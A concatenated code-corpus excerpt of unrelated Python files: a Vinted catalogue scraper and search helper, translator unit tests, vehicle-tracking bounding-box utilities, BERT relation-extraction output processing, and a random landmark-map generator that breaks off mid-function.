brands = re.findall(r"({\"id\":[0-9]+,\"title\":\"[^\"]+\",\"slug\":[^}]+})", req)
for brand in brands:
brand = json.loads(brand)
if brand not in id_DATA:
id_DATA.append(brand)
print("#######################\n"+id_name.split("_")[0].capitalize()+" ID Extraction...")
print(new_url)
print("Ids processed : "+str(x*chunk_size))
print("IDs found : "+str(len(id_DATA)))
return id_DATA
def params(id_supported,id_names=id_names):
"""
This function will format the id_names as a list.
Parameters
----------
id_names : STRING or LIST, optional
A list or string that should correpond to one of the supported Vinted IDs. The default is id_names.
id_supported : DICTIONARY
A dictionary containing supported Vinted IDs and their corresponding information
Returns
-------
id_names : LIST
A list of supported Vinted IDs.
"""
def check_supported_ids(id_names=id_names,id_supported=id_supported):
"""
This function will check if all ids in id_name are supported.
Parameters
----------
id_names : list, optional
A list or string that should correpond to one of the supported Vinted IDs. The default is id_names.
id_supported : TYPE, optional
A dictionary containing supported Vinted IDs and their corresponding information. The default is id_supported.
Returns
-------
BOOLEAN
"""
id_not_supported = []
for i in id_names:
if i not in id_supported:
id_not_supported.append(i)
if len(id_not_supported) != 0:
raise(f'Following ids are not supported currently ({id_names}), please check supported ids.\n {str_id_supp}')
return True
if isinstance(id_names, str) and id_names in id_supported:
return [id_names]
if isinstance(id_names, list) and check_supported_ids(id_names,id_supported):
return id_names
str_id_supp = id_supported.keys()
raise(f'Following id is not supported currently ({id_names}), please check supported ids.\n {str_id_supp}')
def regexMatching(id_name,id_supported):
"""
This function will, from an ID name, extract the corresponding Python object from Vinted with a regex matching.
Parameters
----------
id_name : STRING
A string corresponding to a supported Vinted ID.
id_supported : DICTIONARY
Dictionary which contains Vinted IDs and their corresponding information.
Returns
-------
id_DATA : JSON - PYTHON OBJECT
Python object corresponding to the JSON found in Vinted data corresponding to the id_name.
"""
req = requests.get(url).text
id_DATA = json.loads(re.findall(id_supported[id_name]["regex"], req)[0])
if "mainStore" in id_supported[id_name]:
return id_DATA["catalogFilters"]["dtos"][id_supported[id_name]["mainStore"]]
return id_DATA
def colorModification(id_DATA):
"""
This function will add the # to the hex field of the Python object corresponding to the ID color in Vinted.
Parameters
----------
id_DATA : JSON - PYTHON OBJECT
The python object collected for the color ID.
Returns
-------
id_DATA : JSON - PYTHON OBJECT
The same python object collected for the color ID, but with the # in front of the hex values.
"""
for color in id_DATA:
color["hex"] = "#"+color["hex"]
return id_DATA
id_supported["color"]["modification"] = colorModification
id_supported["brand"]["function"] = brandIds
for i in id_supported:
if "regex" in id_supported[i]:
id_supported[i]["function"] = regexMatching
id_names = params(id_supported)
collected_data = {}
for id_name in id_names:
id_DATA = id_supported[id_name]["function"](id_name,id_supported)
if "modification" in id_supported[id_name]:
id_DATA = id_supported[id_name]["modification"](id_DATA)
collected_data[id_name]=id_DATA
print(id_name.capitalize()+" found : "+str(len(id_DATA)))
if save:
for id_collected in collected_data:
with open("./DATA/"+id_collected+".json",'w') as outfile:
json.dump(collected_data[id_collected],outfile,indent=2)
return collected_data
def searchVinted(print_url=True,searchText="",catalog=[],color=[],brand=[],size=[],material=[],status=[],country=[],price_to=1000000,price_from=0,currency="EUR",per_page=120,page=1):
"""
This function try to a programmatic way to search for item within Vinted thanks to Vinted data extract everyday and store in the folder DATA.
Parameters
----------
searchText : STRING, optional
A string that will correspond to a search with the Vinted search bar.
catalog : LIST, optional
A list of specific IDs or catalog names.
color : LIST, optional
A list of specific IDs or color names.
brand : LIST, optional
A list of specific IDs or brand names.
size : LIST, optional
A list of specific IDs or size names.
material : LIST, optional
A list of specific IDs or material names.
status : LIST, optional
A list of specific IDs or status names.
country : LIST, optional
A list of specific IDs or country names.
price_to : INTEGER, optional
A maximum price fix as the max limit.
price_from : INTEGER, optional
A minimum price fix as the min limit.
currency : STRING, optional
The currency in which you want the prices.
per_page : INTEGER, optional
The number of items per page in your result.
page : INTEGER, optional
The page index.
Return
------
--- : DICTIONARY
This function will return a dictionary looking like :
{
"items": [item1,item2,item3,item4,...,itemN],
"searchParams":{Parameters of the search within Vinted}
}
"""
def matchingIDs(ID_name,IDs):
"""
This function will try to match the information provided as ID to the data corresponding to the ID_name.
For example if we provide the ID_name 'color', we can either provide an integer ID or a string such as 'pink' for the corresponding color.
Parameters
----------
ID_name : STRING
An ID name corresponding to one of the supported id within id_supported.
IDs : LIST
A list of integer or string corresponding to IDs found within Vinted data.
Return
------
IDs_requested : LIST
A list of matched IDs corresponding to information provided in IDs.
"""
def findID(ID_name,ID,data):
"""
This function will try to match an ID to the 'ID' provided, it can either be an integer or a string corresponding to a term inside the title of ID for example 'rose' for the color pink.
Parameters
----------
ID_name : STRING
A string that correspond to one if the ID name supported (Check the dictionary id_supported).
ID : STRING OR INTEGER
If ID is an integer it will be consider as the ID to look for (except for sizes as these can sometimes be integer), if it is a string then the algorithm will try to match an ID based on the string provided.
data : LIST
A list of dictionaries corresponding to one of the JSON file in the DATA folder.
Return
------
--- : LIST
A list of IDs matched to the string or integer provided as ID.
"""
def matchNames(ID_name,ID,data):
"""
This function will return the corresponding ids matched to the ID provided with the parameter data and ID_name. IDs will be matched through a string matching.
Parameters
----------
ID_name : STRING
The name of the ID to check for example if you are looking for 'H&M' brand the ID_name should be 'brand'.
ID : STRING
The string provided to find within the data for example for an ID_name='brand' the ID can be 'Nike'.
data : LIST
A list of dictionaries corresponding to one of the JSON file in the DATA folder.
Return
------
matched_ids : LIST
A list of integer corresponding to the IDs matched.
"""
matched_ids = []
for data_id in data:
if ID.lower() in [data_id[n].lower() for n in id_supported[ID_name]["names"] if n in data_id]:
matched_ids.append(data_id["id"])
return matched_ids
def isInt(s):
"""
This function will check if the s object is an integer or not and return the corresponding boolean.
Parameters
----------
s : PYTHON OBJECT
The Python object that need to be checked.
Return
------
A BOOLEAN
"""
try:
int(s)
return True
except ValueError:
return False
if "only_string" in id_supported[ID_name] and id_supported[ID_name]["only_string"]:
return matchNames(ID_name,ID,data)
if isInt(ID):
return [int(ID)]
return matchNames(ID_name,ID,data)
def treeWalk(ID_name,ID,tree):
"""
Recursive function that will walk through all parents and child of the tree provided as parameter to find the corresponding IDs.
Parameters
----------
ID_name : STRING
The name of the ID to check for example if you are looking for 'H&M' brand the ID_name should be 'brand'.
ID : STRING
The string provided to find within the data for example for an ID_name='brand' the ID can be 'Nike'.
tree : LIST
A list of dictionaries corresponding to one of the JSON file in the DATA folder, ordered as a tree with parents and childs IDs.
Return
------
found_IDs : LIST
A list of integer corresponding to the IDs matched.
"""
found_IDs = findID(ID_name,ID,tree)
# Recursive loop
for item in tree:
if id_supported[ID_name]["nested"] in item and len(item[id_supported[ID_name]["nested"]])>0:
found_IDs += treeWalk(ID_name,ID,item[id_supported[ID_name]["nested"]])
return found_IDs
IDs_requested = []
# Checking parameters
if ID_name not in id_supported:
raise f"{str(ID_name)} not supported please check the following supported IDs {' / '.join(id_supported)}"
if not isinstance(IDs,list):
if isinstance(IDs,str):
IDs = [IDs]
else:
raise f"{str(IDs)} must be a string or a list."
# Loading corresponding data
with open(file=data_repository+ID_name+".json",mode="r") as f:
data = json.loads(f.read())
# Loop through provided information
for ID in IDs:
if "nested" in id_supported[ID_name]:
IDs_requested += treeWalk(ID_name,ID,data)
tmp = []
for i in IDs_requested:
if i not in tmp:
tmp.append(i)
IDs_requested = tmp
else:
IDs_requested += findID(ID_name,ID,data)
return IDs_requested
params = {
"catalog":catalog,
"color":color,
"brand":brand,
"size":size,
"material":material,
"status":status,
"country":country
}
url_search = "https://www.vinted.fr/vetements?search_text="+searchText
url_params = {
"per_page":per_page,
"page":page,
"price_from":price_from,
"price_to":price_to,
"currency":currency
}
for param in params:
if len(params[param]) != 0:
url_params[id_supported[param]["url_name"]]=matchingIDs(param,params[param])
req = requests.get(url_search,params=url_params)
if print_url:
print(req.url)
items = json.loads(re.findall(r'<script type="application/json" data-js-react-on-rails-store="MainStore">([^<]+)</script>',req.text)[0])["items"]
return {"items":items["byId"],"searchParams":items["catalogItems"]}
def getField(items,field_names=["id"]):
"""
This function will extract, from the result of Vinted search through searchVinted function, all values of a specific field. For example in each Item there is a field called 'price', with this function you can get a list of all prices from your search.
Parameters
----------
items : LIST
An item list that corresponds to a list of dictionaries which can be found as the item "items" of the searchVinted response.
field_names : LIST, optional
A list of field names provided as strings. For examples , "prices","id","photo",etc.
Returns
-------
VALUES : DICTIONARY
The dictionary will corresponds to the name of the field as the key and the list of values as value.
"""
VALUES = {}
for field_name in field_names:
VALUES[field_name] = []
for item in items:
if field_name not in items[item]:
raise f"The field name {field_name} does not exists within the following item :\n {items[item]}"
VALUES[field_name].append(items[item][field_name])
return VALUES
def getData(ID_name):
with open(file=data_repository+ID_name+".json",mode="r") as f:
return json.loads(f.read())
if __name__ == '__main__':
JSONfromID()
``` |
{
"source": "0AlphaZero0/xzceb-flask_eng_fr",
"score": 3
} |
#### File: machinetranslation/tests/tests.py
```python
import unittest
from translator import english_to_french, french_to_english
class TestTranslateEnToFr(unittest.TestCase):
"""
Class to test the function english_to_french
"""
def test1(self):
"""
Function to test the function english_to_french
"""
self.assertIsNone(english_to_french(None))
self.assertEqual(english_to_french("Hello"), "Bonjour")
self.assertNotEqual(english_to_french("Bonjour"), "Hello")
class TestTranslateFrToEn(unittest.TestCase):
"""
Class to test the function french_to_english
"""
def test1(self):
"""
Function to test the function french_to_english
"""
self.assertIsNone(french_to_english(None))
self.assertEqual(french_to_english("Bonjour"), "Hello")
self.assertNotEqual(french_to_english("Hello"), "Bonjour")
unittest.main()
``` |
{
"source": "0AnonymousSite0/Data-and-Codes-for-Integrating-Computer-Vision-and-Traffic-Modelling",
"score": 3
} |
#### File: Detecting and tracking vehicle (CPU version)/blobs/utils.py
```python
def get_centroid(bounding_box):
(x, y, w, h) = bounding_box
return (round((x + x + w) / 2), round((y + y + h) / 2))
def box_contains_point(bbox, pt):
return bbox[0] < pt[0] < bbox[0] + bbox[2] and bbox[1] < pt[1] < bbox[1] + bbox[3]
def get_area(bbox):
_, _, w, h = bbox
return w * h
def get_iou(bbox1, bbox2):
# calculate the Intersection over Union (IoU) of two bounding boxes
bbox1_x1 = bbox1[0]
bbox1_y1 = bbox1[1]
bbox1_x2 = bbox1[0] + bbox1[2]
bbox1_y2 = bbox1[1] + bbox1[3]
bbox2_x1 = bbox2[0]
bbox2_y1 = bbox2[1]
bbox2_x2 = bbox2[0] + bbox2[2]
bbox2_y2 = bbox2[1] + bbox2[3]
overlap_x1 = max(bbox1_x1, bbox2_x1)
overlap_y1 = max(bbox1_y1, bbox2_y1)
overlap_x2 = min(bbox1_x2, bbox2_x2)
overlap_y2 = min(bbox1_y2, bbox2_y2)
overlap_width = overlap_x2 - overlap_x1
overlap_height = overlap_y2 - overlap_y1
if overlap_width < 0 or overlap_height < 0:
return 0.0
overlap_area = overlap_width * overlap_height
bbox1_area = (bbox1_x2 - bbox1_x1) * (bbox1_y2 - bbox1_y1)
bbox2_area = (bbox2_x2 - bbox2_x1) * (bbox2_y2 - bbox2_y1)
combined_area = bbox1_area + bbox2_area - overlap_area
epsilon = 1e-5 # small value to prevent division by zero
iou = overlap_area / (combined_area + epsilon)
return iou
def get_inside(bbox1, bbox2):
# calculate the Intersection over Union (IoU) of two bounding boxes
bbox1_x1 = bbox1[0]
bbox1_y1 = bbox1[1]
bbox1_x2 = bbox1[0] + bbox1[2]
bbox1_y2 = bbox1[1] + bbox1[3]
bbox2_x1 = bbox2[0]
bbox2_y1 = bbox2[1]
bbox2_x2 = bbox2[0] + bbox2[2]
bbox2_y2 = bbox2[1] + bbox2[3]
inside=0
if bbox1_x1<bbox2_x1 and bbox1_y1<bbox2_y1 and bbox1_x2>bbox2_x2 and bbox1_y2>bbox2_y2:
inside=1
elif bbox1_x1 > bbox2_x1 and bbox1_y1 > bbox2_y1 and bbox1_x2 < bbox2_x2 and bbox1_y2 < bbox2_y2:
inside = 2
else:
inside=0
return inside
```
#### File: Detecting and tracking vehicle (GPU version)/util/logger.py
```python
import cv2
import os
import sys
import pathlib
import json
import uuid
from datetime import datetime
def send_to_stdout(level, message, data):
events_to_not_log = ['TRACKER_UPDATE']
#if data['event'] not in events_to_not_log:
#print('[{0}]'.format(datetime.now()), level + ':', message, json.dumps(data))
def send_to_log_file():
pass
def send_to_redis_pubsub():
pass
def log_error(message, data):
send_to_stdout('ERROR', message, data)
sys.exit(0)
def log_info(message, data):
send_to_stdout('INFO', message, data)
def log_debug(message, data):
send_to_stdout('DEBUG', message, data)
def take_screenshot(frame):
screenshots_directory = 'data/screenshots'
pathlib.Path(screenshots_directory).mkdir(parents=True, exist_ok=True)
screenshot_path = os.path.join(screenshots_directory, 'img_' + uuid.uuid4().hex + '.jpg')
cv2.imwrite(screenshot_path, frame, [cv2.IMWRITE_JPEG_QUALITY, 80])
log_info('Screenshot captured.', {
'event': 'SCREENSHOT_CAPTURE',
'path': screenshot_path,
})
``` |
{
"source": "0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model",
"score": 2
} |
#### File: Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
```python
import os
import json
# 获取最新模型预测数据文件夹
def get_latest_model_predict_data_dir(new_epochs_ckpt_dir=None):
# 获取文件下最新文件路径
def new_report(test_report):
lists = os.listdir(test_report) # 列出目录的下所有文件和文件夹保存到lists
lists.sort(key=lambda fn: os.path.getmtime(test_report + "/" + fn)) # 按时间排序
file_new = os.path.join(test_report, lists[-1]) # 获取最新的文件保存到file_new
return file_new
if new_epochs_ckpt_dir is None:
# 获取分类预测输出文件路径
input_new_epochs = os.path.join(
os.path.abspath(os.path.join(os.path.dirname(__file__), "output")), "sequnce_infer_out")
# 获取最新周期文件路径
new_ckpt_dir = new_report(input_new_epochs)
input_new_epochs_ckpt = os.path.join(input_new_epochs, new_ckpt_dir)
# 获取最新周期下最新模型文件路径
new_epochs_ckpt_dir = new_report(input_new_epochs_ckpt)
if not os.path.exists(new_ckpt_dir):
raise ValueError("路径不存在!{}".format(new_epochs_ckpt_dir))
return new_epochs_ckpt_dir
# dict is comes from raw_data all_50_schemas
schemas_dict_relation_2_object_subject_type = {
'Road_status':[('Status','Road')],
'Lane_status':[('Status','Lane')],
'Road_position':[('Position_of_road','Road')],
# 'At':[('Road','Road')],
# 'PRIOR':[('Road','Road')],
# 'PAST':[('Road','Road')],
# 'Bet':[('Road','Road')],
'Lane_of_Road':[('Road','Lane')],
'Lane_direction':[('Direction_of_lane','Lane')],
'Lane_position':[('Position_of_lane','Lane')],
'Road_direction':[('Direction_of_road','Road')],
#'Lane_number':[('Number','Lane')]
# '父亲': [('人物', '人物')],
# '妻子': [('人物', '人物')],
# '母亲': [('人物', '人物')],
# '丈夫': [('人物', '人物')],
# '祖籍': [('地点', '人物')],
# '总部地点': [('地点', '企业')],
# '出生地': [('地点', '人物')],
# '目': [('目', '生物')],
# '面积': [('Number', '行政区')],
# '简称': [('Text', '机构')],
# '上映时间': [('Date', '影视作品')],
# '所属专辑': [('音乐专辑', '歌曲')],
# '注册资本': [('Number', '企业')],
# '首都': [('城市', '国家')],
# '导演': [('人物', '影视作品')],
# '字': [('Text', '历史人物')],
# '身高': [('Number', '人物')],
# '出品公司': [('企业', '影视作品')],
# '修业年限': [('Number', '学科专业')],
# '出生日期': [('Date', '人物')],
# '制片人': [('人物', '影视作品')],
# '编剧': [('人物', '影视作品')],
# '国籍': [('国家', '人物')],
# '海拔': [('Number', '地点')],
# '连载网站': [('网站', '网络小说')],
# '朝代': [('Text', '历史人物')],
# '民族': [('Text', '人物')],
# '号': [('Text', '历史人物')],
# '出版社': [('出版社', '书籍')],
# '主持人': [('人物', '电视综艺')],
# '专业代码': [('Text', '学科专业')],
# '歌手': [('人物', '歌曲')],
# '作词': [('人物', '歌曲')],
# '主角': [('人物', '网络小说')],
# '董事长': [('人物', '企业')],
# '成立日期': [('Date', '机构'), ('Date', '企业')],
# '毕业院校': [('学校', '人物')],
# '占地面积': [('Number', '机构')],
# '官方语言': [('语言', '国家')],
# '邮政编码': [('Text', '行政区')],
# '人口数量': [('Number', '行政区')],
# '所在城市': [('城市', '景点')],
# '作者': [('人物', '图书作品')],
# '作曲': [('人物', '歌曲')],
# '气候': [('气候', '行政区')],
# '嘉宾': [('人物', '电视综艺')],
# '主演': [('人物', '影视作品')],
# '改编自': [('作品', '影视作品')],
# '创始人': [('人物', '企业')]
}
class File_Management(object):
"""读取TXT文件,以列表形式返回文件内容"""
def __init__(self, TEST_DATA_DIR=None, MODEL_OUTPUT_DIR=None, Competition_Mode=True):
self.TEST_DATA_DIR = TEST_DATA_DIR
self.MODEL_OUTPUT_DIR = get_latest_model_predict_data_dir(MODEL_OUTPUT_DIR)
self.Competition_Mode = Competition_Mode
def file_path_and_name(self):
text_sentence_file_path = os.path.join(self.TEST_DATA_DIR, "text_and_one_predicate.txt")
token_in_file_path = os.path.join(self.TEST_DATA_DIR, "token_in_not_UNK_and_one_predicate.txt")
predicate_token_label_file_path = os.path.join(self.MODEL_OUTPUT_DIR, "token_label_predictions.txt")
file_path_list = [text_sentence_file_path, token_in_file_path, predicate_token_label_file_path]
file_name_list = ["text_sentence_list", "token_in_not_NUK_list ", "token_label_list",]
if not self.Competition_Mode:
spo_out_file_path = os.path.join(self.TEST_DATA_DIR, "spo_out.txt")
if os.path.exists(spo_out_file_path):
file_path_list.append(spo_out_file_path)
file_name_list.append("reference_spo_list")
return file_path_list, file_name_list
def read_file_return_content_list(self):
file_path_list, file_name_list = self.file_path_and_name()
content_list_summary = []
for file_path in file_path_list:
with open(file_path, "r", encoding='utf-8') as f:
content_list = f.readlines()
content_list = [content.replace("\n", "") for content in content_list]
content_list_summary.append(content_list)
if self.Competition_Mode:
content_list_length_summary = [(file_name, len(content_list)) for content_list, file_name in
zip(content_list_summary, file_name_list)]
file_line_number = self._check_file_line_numbers(content_list_length_summary)
print("Competition_Mode=True, check file line pass!")
print("输入文件行数一致,行数是: ", file_line_number)
else:
file_line_number = len(content_list_summary[0])
print("first file line number: ", file_line_number)
print("do not check file line! if you need check file line, set Competition_Mode=True")
print("\n")
return content_list_summary, file_line_number
def _check_file_line_numbers(self, content_list_length_summary):
content_list_length_file_one = content_list_length_summary[0][1]
for file_name, file_line_number in content_list_length_summary:
assert file_line_number == content_list_length_file_one
return content_list_length_file_one
class Sorted_relation_and_entity_list_Management(File_Management):
"""
生成按概率大小排序的可能关系列表和按照原始句子中顺序排序的实体列表
"""
def __init__(self, TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=False):
File_Management.__init__(self, TEST_DATA_DIR=TEST_DATA_DIR, MODEL_OUTPUT_DIR=MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
# 关系列表 把模型输出的实数值对应为标签
#self.relationship_label_list = ['丈夫', '上映时间', '专业代码', '主持人', '主演', '主角', '人口数量', '作曲', '作者', '作词', '修业年限', '出品公司', '出版社', '出生地', '出生日期', '创始人', '制片人', '占地面积', '号', '嘉宾', '国籍', '妻子', '字', '官方语言', '导演', '总部地点', '成立日期', '所在城市', '所属专辑', '改编自', '朝代', '歌手', '母亲', '毕业院校', '民族', '气候', '注册资本', '海拔', '父亲', '目', '祖籍', '简称', '编剧', '董事长', '身高', '连载网站', '邮政编码', '面积', '首都']
self.relationship_label_list = ['Road_status','Lane_status','At','PRIOR', 'PAST', 'Bet', 'LaneOfRoad','Lane_direction','Lane_position','Road_direction','Lane_number']
self.Competition_Mode = Competition_Mode
print("test数据输入路径是:\t{}".format(self.TEST_DATA_DIR))
print("最新模型预测结果路径是:\t{}".format(self.MODEL_OUTPUT_DIR))
def get_input_list(self,):
content_list_summary, self.file_line_number = self.read_file_return_content_list()
if len(content_list_summary) == 4:
[text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list] = content_list_summary
elif len(content_list_summary) == 3:
[text_sentence_list, token_in_not_NUK_list, token_label_list] = content_list_summary
reference_spo_list = [None] * len(text_sentence_list)
else:
raise ValueError("check code!")
print(reference_spo_list)
return text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list
#合并由WordPiece切分的词和单字
def _merge_WordPiece_and_single_word(self, entity_sort_list):
# [..['B-SUB', '新', '地', '球', 'ge', '##nes', '##is'] ..]---> [..('SUB', '新地球genesis')..]
entity_sort_tuple_list = []
for a_entity_list in entity_sort_list:
entity_content = ""
entity_type = None
for idx, entity_part in enumerate(a_entity_list):
if idx == 0:
entity_type = entity_part
if entity_type[:2] not in ["B-", "I-"]:
break
else:
if entity_part.startswith("##"):
entity_content += entity_part.replace("##", "")
else:
entity_content += entity_part
if entity_content != "":
entity_sort_tuple_list.append((entity_type[2:], entity_content))
return entity_sort_tuple_list
# 把spo_out.txt 的[SPO_SEP] 分割形式转换成标准列表字典形式
# 妻子 人物 人物 杨淑慧 周佛海[SPO_SEP]丈夫 人物 人物 周佛海 杨淑慧 ---> dict
def preprocessing_reference_spo_list(self, refer_spo_str):
refer_spo_list = refer_spo_str.split("[SPO_SEP]")
refer_spo_list = [spo.split(" ") for spo in refer_spo_list]
refer_spo_list = [dict([('predicate', spo[0]),
('object_type', spo[2]), ('subject_type', spo[1]),
('object', spo[4]), ('subject', spo[3])]) for spo in refer_spo_list]
print(refer_spo_list)
refer_spo_list.sort(key= lambda item:item['predicate'])
return refer_spo_list
# 把模型输出实体标签按照原句中相对位置输出
def model_token_label_2_entity_sort_tuple_list(self, token_in_not_UNK_list, predicate_token_label_list):
"""
:param token_in_not_UNK: ['紫', '菊', '花', '草', '是', '菊', '目', ',', '菊', '科', ',', '松', '果', '菊', '属', '的', '植', '物']
:param predicate_token_label: ['B-SUB', 'I-SUB', 'I-SUB', 'I-SUB', 'O', 'B-OBJ', 'I-OBJ', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O']
:return: [('SUB', '紫菊花草'), ('OBJ', '菊目')]
"""
# 除去模型输出的特殊符号
def preprocessing_model_token_lable(predicate_token_label_list, token_in_list_lenth):
# ToDo:检查错误,纠错
if predicate_token_label_list[0] == "[CLS]":
predicate_token_label_list = predicate_token_label_list[1:] # y_predict.remove('[CLS]')
if len(predicate_token_label_list) > token_in_list_lenth: # 只取输入序列长度即可
predicate_token_label_list = predicate_token_label_list[:token_in_list_lenth]
return predicate_token_label_list
# 预处理标注数据列表
predicate_token_label_list = preprocessing_model_token_lable(predicate_token_label_list, len(token_in_not_UNK_list))
entity_sort_list = []
entity_part_list = []
#TODO:需要检查以下的逻辑判断,可能写的不够完备充分
for idx, token_label in enumerate(predicate_token_label_list):
# 如果标签为 "O"
if token_label == "O":
# entity_part_list 不为空,则直接提交
if len(entity_part_list) > 0:
entity_sort_list.append(entity_part_list)
entity_part_list = []
# 如果标签以字符 "B-" 开始
if token_label.startswith("B-"):
# 如果 entity_part_list 不为空,则先提交原来 entity_part_list
if len(entity_part_list) > 0:
entity_sort_list.append(entity_part_list)
entity_part_list = []
entity_part_list.append(token_label)
entity_part_list.append(token_in_not_UNK_list[idx])
# 如果到了标签序列最后一个标签处
if idx == len(predicate_token_label_list) - 1:
entity_sort_list.append(entity_part_list)
# 如果标签以字符 "I-" 开始 或者等于 "[##WordPiece]"
if token_label.startswith("I-") or token_label == "[##WordPiece]":
# entity_part_list 不为空,则把该标签对应的内容并入 entity_part_list
if len(entity_part_list) > 0:
entity_part_list.append(' ') #英文需要这一行,中文不需要这一行
entity_part_list.append(token_in_not_UNK_list[idx])
# 如果到了标签序列最后一个标签处
if idx == len(predicate_token_label_list) - 1:
entity_sort_list.append(entity_part_list)
# 如果遇到 [SEP] 分隔符,说明需要处理的标注部分已经结束
if token_label == "[SEP]":
break
entity_sort_tuple_list = self._merge_WordPiece_and_single_word(entity_sort_list)
print(entity_sort_tuple_list)
return entity_sort_tuple_list
# 生成排好序的关系列表和实体列表
def produce_relationship_and_entity_sort_list(self):
text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list = self.get_input_list()
for [text_sentence, token_in_not_UNK, token_label, refer_spo_str] in\
zip(text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list):
text = text_sentence.split("\t")[0]
text_predicate = text_sentence.split("\t")[1]
token_in = token_in_not_UNK.split("\t")[0].split(" ")
token_in_predicate = token_in_not_UNK.split("\t")[1]
assert text_predicate == token_in_predicate
token_label_out = token_label.split(" ")
entity_sort_tuple_list = self.model_token_label_2_entity_sort_tuple_list(token_in, token_label_out)
if self.Competition_Mode:
yield text, text_predicate, entity_sort_tuple_list, None
else:
if refer_spo_str is not None:
refer_spo_list = self.preprocessing_reference_spo_list(refer_spo_str)
else:
refer_spo_list = []
yield text, text_predicate, entity_sort_tuple_list, refer_spo_list
# 打印排好序的关系列表和实体列表
def show_produce_relationship_and_entity_sort_list(self):
idx = 0
for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
print("序号: ", idx + 1)
print("原句: ", text)
print("预测的关系: ", text_predicate)
print("预测的实体: ", entity_sort_tuple_list)
print("参考的 spo_slit:", refer_spo_list)
print("\n")
idx += 1
if idx == 100:
break
def produce_output_file(self, OUT_RESULTS_DIR=None, keep_empty_spo_list=False):
filename = "subject_predicate_object_predict_output.json"
output_dict = dict()
for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
object_type, subject_type = schemas_dict_relation_2_object_subject_type[text_predicate][0]
subject_list = [value for name, value in entity_sort_tuple_list if name == "SUB"]
subject_list = list(set(subject_list))
subject_list = [value for value in subject_list if len(value) >= 2]
object_list = [value for name, value in entity_sort_tuple_list if name == "OBJ"]
object_list = list(set(object_list))
object_list = [value for value in object_list if len(value) >= 2]
if len(subject_list) == 0 or len(object_list) == 0:
output_dict.setdefault(text, [])
for subject_value in subject_list:
for object_value in object_list:
output_dict.setdefault(text, []).append({"object_type": object_type, "predicate": text_predicate,
"object": object_value, "subject_type": subject_type,
"subject": subject_value})
if keep_empty_spo_list:
filename = "keep_empty_spo_list_" + filename
if OUT_RESULTS_DIR is None:
out_path = filename
else:
out_path = os.path.join(OUT_RESULTS_DIR, filename)
print("生成结果的输出路径是:\t{}".format(out_path))
if not os.path.exists(OUT_RESULTS_DIR):
os.makedirs(OUT_RESULTS_DIR)
result_json_write_f = open(out_path, "w", encoding='utf-8')
count_line_number = 0
count_empty_line_number = 0
for text, spo_list in output_dict.items():
count_line_number += 1
line_dict = dict()
line_dict["text"] = text
line_dict["spo_list"] = spo_list
line_json = json.dumps(line_dict, ensure_ascii=False)
if len(spo_list) == 0:
count_empty_line_number += 1
if keep_empty_spo_list:
result_json_write_f.write(line_json + "\n")
else:
if len(spo_list) > 0:
result_json_write_f.write(line_json + "\n")
print("empty_line: {}, line: {}, percentage: {:.2f}%".format(count_empty_line_number, count_line_number,
(count_empty_line_number / count_line_number) * 100))
if __name__=='__main__':
TEST_DATA_DIR = "bin/subject_object_labeling/sequence_labeling_data/test"
# MODEL_OUTPUT_DIR = "output/sequnce_infer_out/epochs9/ckpt20000"
MODEL_OUTPUT_DIR = None
OUT_RESULTS_DIR = "output/final_text_spo_list_result"
Competition_Mode = True
spo_list_manager = Sorted_relation_and_entity_list_Management(TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
spo_list_manager.produce_output_file(OUT_RESULTS_DIR=OUT_RESULTS_DIR, keep_empty_spo_list=True)
``` |
{
"source": "0anton/pnl-analysis",
"score": 3
} |
#### File: src/abstract/ExchangeClientWrapper.py
```python
from abc import ABC, abstractmethod
from requests import get
from requests.models import PreparedRequest
import json
class ExchangeClientWrapper(ABC):
def __init__(self, client):
self.client = client
@staticmethod
@abstractmethod
def createInstance():
pass
@abstractmethod
def usd_price_for(self,symbol):
pass
@abstractmethod
def get_asset_balance(self, asset):
pass
@abstractmethod
def get_current_asset_balance(self, trading_pair):
pass
@abstractmethod
def get_trades(self, symbol, start_date):
pass
@abstractmethod
def format_data(self,df):
pass
``` |
{
"source": "0aqz0/graph-matching",
"score": 3
} |
#### File: 0aqz0/graph-matching/random_data.py
```python
import matplotlib.pyplot as plt
from matplotlib import patches
import numpy as np
import torch
import pickle
import json
import random
import math
import os
# classes_num = 6
labels = ["tree", "car", "bike", "pedestrain", "well", "light"]
colors = ["green", "black", "royalblue", "bisque", "grey", "yellow"]
total_num = 64
min_x = 0
max_x = 640
min_y = 0
max_y = 480
noise_mu = 0
noise_var = 2.0
visual_range = 160.0
visual_theta = 60.0 # degree
save_path = "./data/" + str(max_x) + "x" + str(max_y) +"/"+ str(total_num)
if not os.path.exists(save_path):
os.makedirs(save_path)
def create_global_map():
global_map = []
for _ in range(total_num):
random_x = random.random() * (max_x - min_x) + min_x
random_y = random.random() * (max_y - min_y) + min_y
random_label = random.randint(0, len(labels)-1)
landmark = [random_x, random_y, random_label]
global_map.append(landmark)
return global_map
def visualize_map(map):
for landmark in map:
plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]])
plt.show()
def add_gaussian_noise(map):
noise_map = []
for landmark in map:
noise = np.random.normal(noise_mu, noise_var, 2)
new_x = landmark[0] + noise[0]
new_y = landmark[1] + noise[1]
new_label = landmark[2]
landmark = [new_x, new_y, new_label]
noise_map.append(landmark)
return noise_map
def create_local_map(map):
random_x = random.random() * (max_x - min_x) + min_x
random_y = random.random() * (max_y - min_y) + min_y
random_ori = random.random() * math.pi * 2 - math.pi
base_pose = [random_x, random_y, random_ori]
translation = np.array([-random_x, -random_y]).T
translation = np.expand_dims(translation, axis=1)
rotation = np.array([[np.cos(random_ori-math.pi/2), np.sin(random_ori-math.pi/2)],
[-np.sin(random_ori-math.pi/2), np.cos(random_ori-math.pi/2)]])
local_map = []
match = []
for i, landmark in enumerate(map):
global_pose = np.array([landmark[0], landmark[1]]).T
